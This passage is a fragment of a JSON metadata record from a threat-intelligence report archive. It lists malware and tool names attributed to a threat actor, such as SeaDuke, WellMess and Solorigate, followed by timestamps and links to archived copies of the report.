"SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434336, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ed410e4ea8da7382544bb0e3567539523930b0d6.pdf", "text": "https://archive.orkl.eu/ed410e4ea8da7382544bb0e3567539523930b0d6.txt", "img": "https://archive.orkl.eu/ed410e4ea8da7382544bb0e3567539523930b0d6.jpg" } }